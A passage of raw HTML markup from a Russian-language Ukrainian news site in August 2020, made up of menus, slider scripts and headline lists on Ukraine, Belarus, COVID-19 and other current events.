href="https://enovosty.com/currency-rates">Курсы валют</a></li><li id="menu-item-4513319" class="menu-item-has-children" style="border-right: 1px solid #fff;"><a href="#">Ещё...</a><ul class="sub-menu"><li><a href="https://enovosty.com/o-proekte">О проекте</a></li><li><a href="https://enovosty.com/author">Авторы</a></li><li><a href="https://enovosty.com/photo-nedeli">Фото недели</a></li><li><a href="https://enovosty.com/presidenty-2019">Кандидаты в президенты 2019</a></li><li><a href="https://enovosty.com/vybory-2019" >Выборы 2019</a></li></ul></li><li id="menu-item-4513417" ><a href="https://enovosty.com/specproekty/rynok-zemli">Рынок земли</a></li><li id="menu-item-4513417" ><a href="https://enovosty.com/tag/COVID-19">COVID-19</a></li></ul></div><script>jQuery(document).ready(function($){if(jQuery( window ).width() < 606){var touchHover = function() {$('.first').click(function(e){e.preventDefault();var $this = $(this);var onHover = $this.attr('data-hover');var linkHref = $this.attr('href');if (linkHref && $this.hasClass(onHover)) {location.href = linkHref;return false;}$this.toggleClass(onHover);});$('.finance').click(function(e){e.preventDefault();var $this = $(this);var onHover = $this.attr('data-hover');var linkHref = $this.attr('href');if (linkHref && $this.hasClass(onHover)) {location.href = linkHref;return false;}$this.toggleClass(onHover);});};$(document).ready(function() { touchHover(); });}});</script> </div>  <div id="body"><div class="cls"></div><div id="sidebarLeft_n" style="width:210px;"><script>jQuery(document).ready(function($){$('#slider').anythingSlider({ theme : 'minimalist-round', buildStartStop  : false,buildNavigation : false,enableNavigation : false,hashTags : false,autoPlay :true,delay : 8000,autoPlayLocked : true,pauseOnHover : true
});});</script><div class="topnews_single slide"><p style="padding: 0 7px;
font-weight: 700;
font-family: arial,verdana,tahoma;
background: url(/wp-content/themes/eizvestia/img/blueline.jpg) repeat-x;
line-height: 9px;
margin: 2px 0 9px;
text-align: center;"><a href="https://enovosty.com/top-news"><span style="background-color: #fff;
font-size: 12px;
color: #326698;
text-transform: uppercase;
padding: 0 9px;">Топ-новости &nbsp;&nbsp;<i style="font-size: 11px;color: #666;font-style: normal;text-transform: none;">за 24 часа</i></span></a></p><ul id="slider"><li><ul class="tact"><li id="li0" style="width:210px;"><a href="https://enovosty.com/news_society/full/2508-ukraincam-detalno-obyasnili-kak-proxodit-medosmotr-pered-shkoloj" title="Украинцам детально объяснили, как проходить медосмотр перед школой"><img width="210" height="156" alt="Украинцам детально объяснили, как проходить медосмотр перед школой" src="https://enovosty.com/wp-content/uploads/2020/08/medosmotr.jpg"></a><a href="https://enovosty.com/news_society/full/2508-ukraincam-detalno-obyasnili-kak-proxodit-medosmotr-pered-shkoloj" title="Украинцам детально объяснили, как проходить медосмотр перед школой" class="name">Украинцам детально объяснили, как проходить медосмотр перед школой <span>(14440)</span></a></li></ul></li><li><ul class="tact"><li id="li1" style="width:210px;"><a href="https://enovosty.com/news_politics/full/2508-ukraina-menyaet-pravila-peresecheniya-granicy-chto-i-dlya-kogo-izmenitsya" title="Украина меняет правила пересечения границы. Что и для кого изменится?"><img width="210" height="156" alt="Украина меняет правила пересечения границы. Что и для кого изменится?" src="https://enovosty.com/wp-content/uploads/2020/08/77c4968-0.jpg"></a><a href="https://enovosty.com/news_politics/full/2508-ukraina-menyaet-pravila-peresecheniya-granicy-chto-i-dlya-kogo-izmenitsya" title="Украина меняет правила пересечения границы. Что и для кого изменится?" class="name">Украина меняет правила пересечения границы. Что и для кого изменится? <span>(2468)</span></a></li></ul></li><li><ul class="tact"><li id="li2" style="width:210px;"><a href="https://enovosty.com/news_society/full/2508-karantin-do-noyabrya-v-kabmine-predlozhili-prodlit-ogranichitelnye-mery" title="В Кабмине хотят продлить карантин до ноября"><img width="210" height="156" alt="В Кабмине хотят продлить карантин до ноября" src="https://enovosty.com/wp-content/uploads/2020/08/karantin.jpg"></a><a href="https://enovosty.com/news_society/full/2508-karantin-do-noyabrya-v-kabmine-predlozhili-prodlit-ogranichitelnye-mery" title="В Кабмине хотят продлить карантин до ноября" class="name">В Кабмине хотят продлить карантин до ноября <span>(956)</span></a></li></ul></li><li><ul class="tact"><li id="li3" style="width:210px;"><a href="https://enovosty.com/news_economy/full/2508-verxovnaya-rada-podderzhala-uvelichenie-minimalnoj-zarplaty" title="Рада поддержала увеличение минимальной зарплаты"><img width="210" height="156" alt="Рада поддержала увеличение минимальной зарплаты" src="https://enovosty.com/wp-content/uploads/2020/08/69_main-23294.jpg"></a><a href="https://enovosty.com/news_economy/full/2508-verxovnaya-rada-podderzhala-uvelichenie-minimalnoj-zarplaty" title="Рада поддержала увеличение минимальной зарплаты" class="name">Рада поддержала увеличение минимальной зарплаты <span>(828)</span></a></li></ul></li><li><ul class="tact"><li id="li4" style="width:210px;"><a href="https://enovosty.com/news_society/full/2508-minzdrav-obnovil-protivoepidemicheskie-pravila-dlya-shkol" title="Минздрав обновил противоэпидемические правила для школ"><img width="210" height="156" alt="Минздрав обновил противоэпидемические правила для школ" src="https://enovosty.com/wp-content/uploads/2020/08/5d666cc8630b2.jpeg"></a><a href="https://enovosty.com/news_society/full/2508-minzdrav-obnovil-protivoepidemicheskie-pravila-dlya-shkol" title="Минздрав обновил противоэпидемические правила для школ" class="name">Минздрав обновил противоэпидемические правила для школ <span>(2536)</span></a></li></ul></li><li><ul class="tact"><li id="li5" style="width:210px;"><a href="https://enovosty.com/news_society/full/2508-na-okkupirovannom-donbasse-v-den-nezavisimosti-terroristy-ustroili-provokaciyu-shtab-oos" title="На оккупированном Донбассе в День Независимости террористы устроили провокацию, - штаб ООС"><img width="210" height="156" alt="На оккупированном Донбассе в День Независимости террористы устроили провокацию, - штаб ООС" src="https://enovosty.com/wp-content/uploads/2020/08/630_360_1536741823-8124.jpg"></a><a href="https://enovosty.com/news_society/full/2508-na-okkupirovannom-donbasse-v-den-nezavisimosti-terroristy-ustroili-provokaciyu-shtab-oos" title="На оккупированном Донбассе в День Независимости террористы устроили провокацию, - штаб ООС" class="name">На оккупированном Донбассе в День Независимости террористы устроили провокацию, - штаб ООС <span>(8048)</span></a></li></ul></li><li><ul class="tact"><li id="li6" style="width:210px;"><a href="https://enovosty.com/news_society/full/2508-v-ukraine-s-1-sentyabrya-povysyat-pensii" title="В Украине с 1 сентября повысят пенсии"><img width="210" height="156" alt="В Украине с 1 сентября повысят пенсии" src="https://enovosty.com/wp-content/uploads/2020/08/3ca8d5d-75-main.jpg"></a><a href="https://enovosty.com/news_society/full/2508-v-ukraine-s-1-sentyabrya-povysyat-pensii" title="В Украине с 1 сентября повысят пенсии" class="name">В Украине с 1 сентября повысят пенсии <span>(5480)</span></a></li></ul></li><li><ul class="tact"><li id="li7" style="width:210px;"><a href="https://enovosty.com/news_abroad/full/2508-lider-severnoj-korei-vpal-v-komu-smi" title="Лидер Северной Кореи впал в кому, - СМИ"><img width="210" height="156" alt="Лидер Северной Кореи впал в кому, - СМИ" src="https://enovosty.com/wp-content/uploads/2020/08/ccad73e3e673c878697f9b9935d27f903a5cdcea.jpg"></a><a href="https://enovosty.com/news_abroad/full/2508-lider-severnoj-korei-vpal-v-komu-smi" title="Лидер Северной Кореи впал в кому, - СМИ" class="name">Лидер Северной Кореи впал в кому, - СМИ <span>(12124)</span></a></li></ul></li><li><ul class="tact"><li id="li8" style="width:210px;"><a href="https://enovosty.com/news_abroad/full/2408-klinika-sharite-navalnogo-otravili" title="Клиника «Шарите»: Навального отравили"><img width="210" height="156" alt="Клиника «Шарите»: Навального отравили" src="https://enovosty.com/wp-content/uploads/2020/08/klinika.jpg"></a><a href="https://enovosty.com/news_abroad/full/2408-klinika-sharite-navalnogo-otravili" title="Клиника «Шарите»: Навального отравили" class="name">Клиника «Шарите»: Навального отравили <span>(9920)</span></a></li></ul></li><li><ul class="tact"><li id="li9" style="width:210px;"><a href="https://enovosty.com/news_society/full/2408-prokladyvat-sebe-put-vpered-dubinkami-eto-put-v-nikuda-mid-ukrainy" title="«Прокладывать себе путь вперед дубинками — это путь в никуда» - МИД Украины"><img width="210" height="156" alt="«Прокладывать себе путь вперед дубинками — это путь в никуда» - МИД Украины" src="https://enovosty.com/wp-content/uploads/2020/08/original-7.jpg"></a><a href="https://enovosty.com/news_society/full/2408-prokladyvat-sebe-put-vpered-dubinkami-eto-put-v-nikuda-mid-ukrainy" title="«Прокладывать себе путь вперед дубинками — это путь в никуда» - МИД Украины" class="name">«Прокладывать себе путь вперед дубинками — это путь в никуда» - МИД Украины <span>(1272)</span></a></li></ul></li><li><ul class="tact"><li id="li10" style="width:210px;"><a href="https://enovosty.com/news_incidents/full/2308-v-kievskom-metro-zaderzhali-boevika-dnr" title="В киевском метро задержали боевика ДНР"><img width="210" height="156" alt="В киевском метро задержали боевика ДНР" src="https://enovosty.com/wp-content/uploads/2020/08/3e9d25f-001.png"></a><a href="https://enovosty.com/news_incidents/full/2308-v-kievskom-metro-zaderzhali-boevika-dnr" title="В киевском метро задержали боевика ДНР" class="name">В киевском метро задержали боевика "ДНР" <span>(7107)</span></a></li></ul></li><li><ul class="tact"><li id="li11" style="width:210px;"><a href="https://enovosty.com/zdorove/full/2308-v-voz-rasskazali-mozhno-li-izbezhat-vtoroj-volny-covid-19" title="В ВОЗ рассказали, можно ли избежать второй волны COVID-19"><img width="210" height="156" alt="В ВОЗ рассказали, можно ли избежать второй волны COVID-19" src="https://enovosty.com/wp-content/uploads/2020/08/rane.jpg"></a><a href="https://enovosty.com/zdorove/full/2308-v-voz-rasskazali-mozhno-li-izbezhat-vtoroj-volny-covid-19" title="В ВОЗ рассказали, можно ли избежать второй волны COVID-19" class="name">В ВОЗ рассказали, можно ли избежать второй волны COVID-19 <span>(3864)</span></a></li></ul></li></ul></div><div class="wiget simple_pr" id="photoPromo" style="background: #ffe3c8;"><div class="caption"><p style=" text-transform: uppercase; font-weight: 700; font-family: arial,verdana,tahoma; margin: 0; display: block; float: left; color: #fff; padding: 0 5px 0 4px; background-color: #f93; height: 17px; font-size: 12px;
"><a style="color: #fff;" href="https://enovosty.com/photo-nedeli">Фото недели</a></p></div><div class="topnews_single slide gallery2" style="width: 168px; height: 230px; padding: 10px 10px 0; background: #fff; margin: 10px;"><ul id="slider_gallery2"><li><ul class="tact"><li id="li0" style="width:168px; background-color: #fff;"><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=563&pid=12233" style="height: 160px;"><img width="168" src="https://enovosty.com/wp-content/gallery/indiya_zh/thumbs/thumbs_01.jpg" style="object-fit: cover;object-position: 100% 0;width: 100%;height: 160px;" alt="Кадры индийского фотографа, запечатлевшие животных"></a><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=563&pid=12233" title="Кадры индийского фотографа, запечатлевшие животных" class="name" style="font-weight: normal;
padding: 5px 3px 5px 3px;
display: block;
margin-left: 2px;
font-size: 15px;
line-height: 1.2;
">Кадры индийского фотографа, запечатлевшие животных</a></li></ul></li><li><ul class="tact"><li id="li1" style="width:168px; background-color: #fff;"><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=562&pid=12225" style="height: 160px;"><img width="168" src="https://enovosty.com/wp-content/gallery/norveg_s/thumbs/thumbs_norway08.jpg" style="object-fit: cover;object-position: 100% 0;width: 100%;height: 160px;" alt="Фото доказывающие, что Норвегия — это ожившая сказка"></a><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=562&pid=12225" title="Фото доказывающие, что Норвегия — это ожившая сказка" class="name" style="font-weight: normal;
padding: 5px 3px 5px 3px;
display: block;
margin-left: 2px;
font-size: 15px;
line-height: 1.2;
">Фото доказывающие, что Норвегия — это ожившая сказка</a></li></ul></li><li><ul class="tact"><li id="li2" style="width:168px; background-color: #fff;"><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=561&pid=12198" style="height: 160px;"><img width="168" src="https://enovosty.com/wp-content/gallery/korona_tatu/thumbs/thumbs_00.jpg" style="object-fit: cover;object-position: 100% 0;width: 100%;height: 160px;" alt="Креативные тату на тему пандемии коронавируса"></a><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=561&pid=12198" title="Креативные тату на тему пандемии коронавируса" class="name" style="font-weight: normal;
padding: 5px 3px 5px 3px;
display: block;
margin-left: 2px;
font-size: 15px;
line-height: 1.2;
">Креативные тату на тему пандемии коронавируса</a></li></ul></li><li><ul class="tact"><li id="li3" style="width:168px; background-color: #fff;"><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=560&pid=12188" style="height: 160px;"><img width="168" src="https://enovosty.com/wp-content/gallery/z_nebo/thumbs/thumbs_05.jpg" style="object-fit: cover;object-position: 100% 0;width: 100%;height: 160px;" alt="Большая выдержка - Звездное небо над головой"></a><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=560&pid=12188" title="Большая выдержка - Звездное небо над головой" class="name" style="font-weight: normal;
padding: 5px 3px 5px 3px;
display: block;
margin-left: 2px;
font-size: 15px;
line-height: 1.2;
">Большая выдержка - Звездное небо над головой</a></li></ul></li></ul></div> <div class="cls"></div> <a href="https://enovosty.com/photo-nedeli" class="readMore">Все фото &raquo;</a></div><script>jQuery(document).ready(function($){$('#slider_gallery2').anythingSlider({ theme : 'minimalist-round', buildStartStop  : false,buildNavigation : false,enableNavigation : false,hashTags : false,autoPlay :true,delay : 8000,autoPlayLocked : true,pauseOnHover : true
});});</script><style>.topnews_single.gallery2 div.anythingSlider-minimalist-round span.arrow{height:160px}</style><div class="wiget simple_line" style="border-color:#D6E5F2;"><div class="caption" style=""><p style="font-size: 12px; height: 17px; color: #fff; background-color: #346796; padding: 0 5px; display: inline; text-transform: uppercase; font-weight: 700;font-family: arial,verdana,tahoma;">Новости мира</p></div><div class='cls'></div><span class='news_date'>25.08.2020 г.</span><br /><div class="post_news"><span id="post-4815775"><span class="postDate">20:26</span><a class="postTitle" href="https://enovosty.com/news_abroad/full/2508-v-belorusskuyu-miliciyu-dostavili-bolee-20-sotrudnikov-grodno-azot">В белорусскую милицию доставили более 20 сотрудников "Гродно Азот"</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4815771"><span class="postDate">18:53</span><a class="postTitle" href="https://enovosty.com/news_abroad/full/2508-elizaveta-ii-gotova-ustupit-svoj-tron-smi">Королева Великобритании Елизавета II готова уступить свой трон - Le Figaro</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4815772"><span class="postDate">18:44</span><a class="postTitle" href="https://enovosty.com/news_abroad/full/2508-rossiya-otomstila-za-smert-svoego-generala-v-sirii-sotni-pogibshix">Россия отомстила за смерть своего генерала в Сирии: сотни погибших</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4815768"><span class="postDate">18:06</span><a class="postTitle" href="https://enovosty.com/news_abroad/full/2508-ministr-oborony-belarusi-18-istrebitelej-nato-gotovyatsya-k-sverzheniyu-lukashenko">Министр обороны Беларуси: «18 истребителей НАТО готовятся к свержению Лукашенко»</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4815764"><span class="postDate">17:26</span><a class="postTitle" href="https://enovosty.com/news_abroad/full/2508-v-kitae-budut-ochen-radikalno-borotsya-s-narushitelyami-samoizolyacii">В Китае будут очень радикально бороться с нарушителями самоизоляции</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4815756"><span class="postDate">15:51</span><a class="postTitle" href="https://enovosty.com/news_abroad/full/2508-kreml-mozhet-fizicheski-likvidirovat-lukashenko-ili-zagnat-ego-v-tupik-ekspert">Кремль может физически ликвидировать Лукашенко или загнать его в тупик, - эксперт</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4815752"><span class="postDate">15:20</span><a class="postTitle" href="https://enovosty.com/news_abroad/full/2508-moskva-reanimiruet-soyuznoe-gosudarstvo-s-belarusyu-bez-ogovorok-zloj-odessit">Москва реанимирует “союзное государство” с Беларусью – без оговорок, - "Злой одессит"</a><br /><div class="postFields"></div></span></div><div class="cls"></div><a class="readMore" href="https://enovosty.com/news/news_abroad">Все новости мира</a></div><div class="wiget simple_line analitika"> <div class="caption"><p style="text-transform: uppercase;
margin: 0;
padding: 0;
text-align: left;
font-size: 12px;
font-weight: 700;
font-family: arial,verdana,tahoma;"><a href="https://enovosty.com/articles">Аналитика</a></p></div><div class="block"><div class="info"><span class="postDate">25.08.2020</span></div><p style="margin-bottom: 3px;
margin: 0;
padding: 0;
text-align: left;
font-size: 12px;
font-weight: 700;
font-family: arial,verdana,tahoma;
"><a class="postTitle" href="https://enovosty.com/society/full/2508-immunolog-andrej-volyanskij-zhestkij-karantin-rastyanet-pandemiyu-v-ukraine-na-dolgie-gody">Иммунолог Андрей Волянский: Жесткий карантин растянет пандемию в Украине на долгие годы</a></p><div class="cblock"><a href="https://enovosty.com/society/full/2508-immunolog-andrej-volyanskij-zhestkij-karantin-rastyanet-pandemiyu-v-ukraine-na-dolgie-gody"><img width="230" alt="Иммунолог Андрей Волянский: Жесткий карантин растянет пандемию в Украине на долгие годы" src="/wp-content/uploads/2020/08/voljanskiĭ-2.jpg"></a></div><span class="postExcerpt"><a href="https://enovosty.com/society/full/2508-immunolog-andrej-volyanskij-zhestkij-karantin-rastyanet-pandemiyu-v-ukraine-na-dolgie-gody">Доктор медицинский наук, заведующий лабораторией имунореабилитологии Института микробиологии и иммунологии им. Мечникова Андрей Волянский одним из первых ...</a></span></div><div class="block"><div class="info"><span class="postDate">22.08.2020</span></div><p style="margin-bottom: 3px;
margin: 0;
padding: 0;
text-align: left;
font-size: 12px;
font-weight: 700;
font-family: arial,verdana,tahoma;
"><a class="postTitle" href="https://enovosty.com/ekonomika/full/2208-chem-lira-v-mire-otzovetsya-obostrit-li-defolt-turcii-globalnyj-koronakrizis">Чем лира в мире отзовется: Обострит ли дефолт Турции глобальный коронакризис?</a></p><div class="cblock"><a href="https://enovosty.com/ekonomika/full/2208-chem-lira-v-mire-otzovetsya-obostrit-li-defolt-turcii-globalnyj-koronakrizis"><img width="230" alt="Чем лира в мире отзовется: Обострит ли дефолт Турции глобальный коронакризис?" src="/wp-content/uploads/2020/08/turkey-lira.jpg"></a></div><span class="postExcerpt"><a href="https://enovosty.com/ekonomika/full/2208-chem-lira-v-mire-otzovetsya-obostrit-li-defolt-turcii-globalnyj-koronakrizis">Финансово-экономическая ситуация в соседней через Черное море Турции в последнее время обостряется и может существенно углубить и расширить глобальный ...</a></span></div><div class="block"><div class="info"><span class="postDate">20.08.2020</span></div><p style="margin-bottom: 3px;
margin: 0;
padding: 0;
text-align: left;
font-size: 12px;
font-weight: 700;
font-family: arial,verdana,tahoma;
"><a class="postTitle" href="https://enovosty.com/politika/full/2008-andrej-piontkovskij-scenarij-putina-i-lukashenko-po-anshlyuzu-i-transferu-vlasti-v-belarusi-provalitsya">Андрей Пионтковский: Сценарий Путина и Лукашенко по аншлюсу и трансферу власти в Беларуси провалится</a></p><div class="cblock"><a href="https://enovosty.com/politika/full/2008-andrej-piontkovskij-scenarij-putina-i-lukashenko-po-anshlyuzu-i-transferu-vlasti-v-belarusi-provalitsya"><img width="230" alt="Андрей Пионтковский: Сценарий Путина и Лукашенко по аншлюсу и трансферу власти в Беларуси провалится" src="/wp-content/uploads/2020/08/lukashenko222.jpg"></a></div><span class="postExcerpt"><a href="https://enovosty.com/politika/full/2008-andrej-piontkovskij-scenarij-putina-i-lukashenko-po-anshlyuzu-i-transferu-vlasti-v-belarusi-provalitsya">Как будет развиваться ситуация в Беларуси в ближайшие недели, чем закончится "гибридная война" Лукашенко против оппозиции, состоится ли военное вторжение ...</a></span></div></div><div class="wiget simple_line" style="border-color:#D6E5F2;"><div class="caption"><p style="font-weight: 700; font-family: arial,verdana,tahoma; font-size: 12px; text-transform: uppercase; margin: 0; padding: 0; text-align: left;height: 17px;"><a href="https://enovosty.com/news/">Последние новости</a></p></div><div class='cls'></div><span class='news_date'>25.08.2020 г.</span><br /><div class="post_news"> <span id="post-4815776"> <span class="postDate">20:33</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/2508-kak-kreml-razduvaet-ogon-v-evrope-ukraina-i-belarus-na-peredovoj-intervyu-s-romanom-bessmertnym-video">Как Кремль раздувает огонь в Европе. Украина и Беларусь на передовой. Интервью с Романом Бессмертным (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4815775"> <span class="postDate">20:26</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2508-v-belorusskuyu-miliciyu-dostavili-bolee-20-sotrudnikov-grodno-azot">В белорусскую милицию доставили более 20 сотрудников "Гродно Азот"</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4815774"> <span class="postDate">20:05</span> <a class="postTitle" href="https://enovosty.com/zdorove/full/2508-vrachi-rasskazali-o-posledstviyax-koronavirusa-u-detej">Врачи рассказали о последствиях коронавируса у детей</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4815771"> <span class="postDate">18:53</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2508-elizaveta-ii-gotova-ustupit-svoj-tron-smi">Королева Великобритании Елизавета II готова уступить свой трон - Le Figaro</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4815738"> <span class="postDate">18:50</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2508-kak-posle-ubijstva-nemcova-yolkin-izobrazil-reakciyu-putina-na-otravlenie-navalnogo">"Как после убийства Немцова": Ёлкин изобразил реакцию Путина на отравление Навального</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4815772"> <span class="postDate">18:44</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2508-rossiya-otomstila-za-smert-svoego-generala-v-sirii-sotni-pogibshix">Россия отомстила за смерть своего генерала в Сирии: сотни погибших</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4815761"> <span class="postDate">18:40</span> <a class="postTitle" href="https://enovosty.com/zdorove/full/2508-distancionnoe-obuchenie-dlya-detej-v-period-pandemii-covid-19-bolshaya-oshibka-immunolog">Дистанционное обучение для детей в период пандемии COVID-19 - большая ошибка, - иммунолог</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4815768"> <span class="postDate">18:06</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2508-ministr-oborony-belarusi-18-istrebitelej-nato-gotovyatsya-k-sverzheniyu-lukashenko">Министр обороны Беларуси: «18 истребителей НАТО готовятся к свержению Лукашенко»</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4815767"> <span class="postDate">18:06</span> <a class="postTitle" href="https://enovosty.com/zdorove/full/2508-ukraina-dazhe-ne-vstupila-v-pervuyu-volnu-koronavirusa-immunolog-rasskazal-chego-zhdat-osenyu">Украина даже не вступила в первую волну коронавируса: Иммунолог рассказал, чего ждать осенью</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4815765"> <span class="postDate">17:37</span> <a class="postTitle" href="https://enovosty.com/news-finance/full/2508-fgvfl-cherez-sud-dobivaetsya-vozmeshheniya-380-mln-griven-ot-semi-avramenko-sobstvennikov-platezhnoj-sistemy-easypay">ФГВФЛ через суд добивается возмещения 380 млн гривен от семьи Авраменко, собственников платежной системы «EasyPay»</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4815736"> <span class="postDate">17:26</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2508-ukraincam-detalno-obyasnili-kak-proxodit-medosmotr-pered-shkoloj">Украинцам детально объяснили, как проходить медосмотр перед школой</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4815764"> <span class="postDate">17:26</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2508-v-kitae-budut-ochen-radikalno-borotsya-s-narushitelyami-samoizolyacii">В Китае будут очень радикально бороться с нарушителями самоизоляции</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4815759"> <span class="postDate">16:56</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/2508-ukraina-menyaet-pravila-peresecheniya-granicy-chto-i-dlya-kogo-izmenitsya">Украина меняет правила пересечения границы. Что и для кого изменится?</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4815751"> <span class="postDate">15:51</span> <a class="postTitle" href="https://enovosty.com/news-culture/full/2508-okean-elzi-vipustili-klip-novoj-pesnej-napisannoj-posle-dlitelnoj-pauzy-video">"Океан Ельзи" выпустили клип на новую песню, написанную после длительной паузы (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4815756"> <span class="postDate">15:51</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2508-kreml-mozhet-fizicheski-likvidirovat-lukashenko-ili-zagnat-ego-v-tupik-ekspert">Кремль может физически ликвидировать Лукашенко или загнать его в тупик, - эксперт</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4815755"> <span class="postDate">15:48</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/2508-v-ukraine-xotyat-predostavit-lgoty-belorusam">В Украине хотят предоставить льготы белорусам</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4815742"> <span class="postDate">15:30</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/2508-yurij-gavrilechko-povyshenie-minimalnoj-zarplaty-yavlyaetsya-pravilnym-shagom">Юрий Гаврилечко: "Повышение минимальной зарплаты является правильным шагом"</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4815752"> <span class="postDate">15:20</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2508-moskva-reanimiruet-soyuznoe-gosudarstvo-s-belarusyu-bez-ogovorok-zloj-odessit">Москва реанимирует “союзное государство” с Беларусью – без оговорок, - "Злой одессит"</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4815749"> <span class="postDate">14:49</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2508-blizitsya-moment-istiny-v-kitae-gotova-rvanut-dolgovaya-bomba">Близится момент истины: В Китае готова рвануть «долговая бомба»</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4815748"> <span class="postDate">14:47</span>  <a class="postTitle orang" href="https://enovosty.com/news_society/full/2508-karantin-do-noyabrya-v-kabmine-predlozhili-prodlit-ogranichitelnye-mery">В Кабмине хотят продлить карантин до ноября</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4815745"> <span class="postDate">14:41</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2508-izvestnyj-karikaturist-obyasnil-pochemu-lukashenko-byl-s-avtomatom-no-bez-rozhka-s-patronami">Известный карикатурист объяснил почему Лукашенко был с автоматом, но без рожка с патронами</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4815746"> <span class="postDate">14:31</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2508-v-rossii-v-kreditax-uvyazli-bolee-70-semej-smi">В России в кредитах увязли более 70% семей, - СМИ</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4815740"> <span class="postDate">13:42</span> <a class="postTitle" href="https://enovosty.com/news_technology/full/2508-budushhee-nachinaetsya-sejchas-v-ssha-ispytali-letayushhuyu-mashinu-foto-video">"Будущее начинается сейчас": В США испытали летающую машину (ФОТО, ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4815733"> <span class="postDate">13:14</span> <a class="postTitle" href="https://enovosty.com/news-markets/full/2508-pokupaem-vygodno-v-ashan">Покупаем выгодно в «АШАН»</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4815704"> <span class="postDate">13:03</span> <a class="postTitle" href="https://enovosty.com/news-auto/full/2508-stolice-zametili-unikalniy-avtomobil-foto">"Бэтмен приехал покушать бургеры": в Киеве на парковке заметили уникальный автомобиль (ФОТО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4815728"> <span class="postDate">12:48</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2508-britanskie-istrebiteli-typhoon-perexvatili-rossijskij-samolet-razvedchik-il-20m">Британские истребители «Typhoon» перехватили российский самолет-разведчик Ил-20М</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4815722"> <span class="postDate">12:36</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2508-kak-prinyat-okna-posle-pokupki-pravila-kotorye-oblegchat-vam-zhizn">Как принять окна после покупки: правила, которые облегчат вам жизнь</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4815719"> <span class="postDate">12:18</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/2508-verxovnaya-rada-podderzhala-uvelichenie-minimalnoj-zarplaty">Рада поддержала увеличение минимальной зарплаты</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4815724"> <span class="postDate">11:59</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2508-transformaciya-aleksandra-lukashenko-iz-mirotvorca-v-diktatora-izgoya-zloj-odessit">Трансформация Александра Лукашенко из миротворца в диктатора-изгоя, - Злой Одессит</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4815716"> <span class="postDate">11:39</span> <a class="postTitle" href="https://enovosty.com/news_incidents/full/2508-v-kieve-marshrutka-utonula-na-ulice-posle-dozhdya-video">В сети появились видео столичных дорог, превратившихся в "реки" (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4815711"> <span class="postDate">11:26</span> <a class="postTitle" href="https://enovosty.com/news-culture/full/2508-mars-kogda-to-zalivalo-moshhnymi-dozhdyami">Марс когда-то заливало мощными дождями</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4815709"> <span class="postDate">10:58</span> <a class="postTitle" 